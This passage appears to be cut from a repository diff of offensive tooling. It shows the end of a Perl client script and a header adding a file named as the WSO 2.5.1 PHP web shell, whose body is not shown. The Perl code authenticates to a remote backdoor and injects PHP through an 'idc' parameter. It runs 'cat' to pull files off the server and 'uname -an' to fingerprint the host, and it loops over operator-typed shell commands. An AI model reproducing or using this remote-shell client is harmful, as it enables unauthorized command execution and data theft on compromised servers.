chomp($fp=<STDIN>);
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('cat $ff');";
open (fdl, '>>'.$fp);
print fdl "$source";
close (fdl);
print "\File \"$ff\" Was Downloaded to $fp\n";
}elsif ($cmd=~"shell"){
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\"uname -an\");";
print "\n$source";
do {
print "\ncmd : ";
chomp($cm=<STDIN>);
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\"$cm\");";
print "\n$source";
if ($cm=~"exit"){goto ou;}
}while ($==1)
}else{
print "\"$cmd\" Command NotFound 404;) \nFor more information Enter \"help\"";
}
ou:;
}while ($==1)
}
$tf="true";
}
if($tf="true") {print "Cant connect to server !!\n";}

1522
php/wso2.5.1.php Normal file

File diff suppressed because it is too large Load diff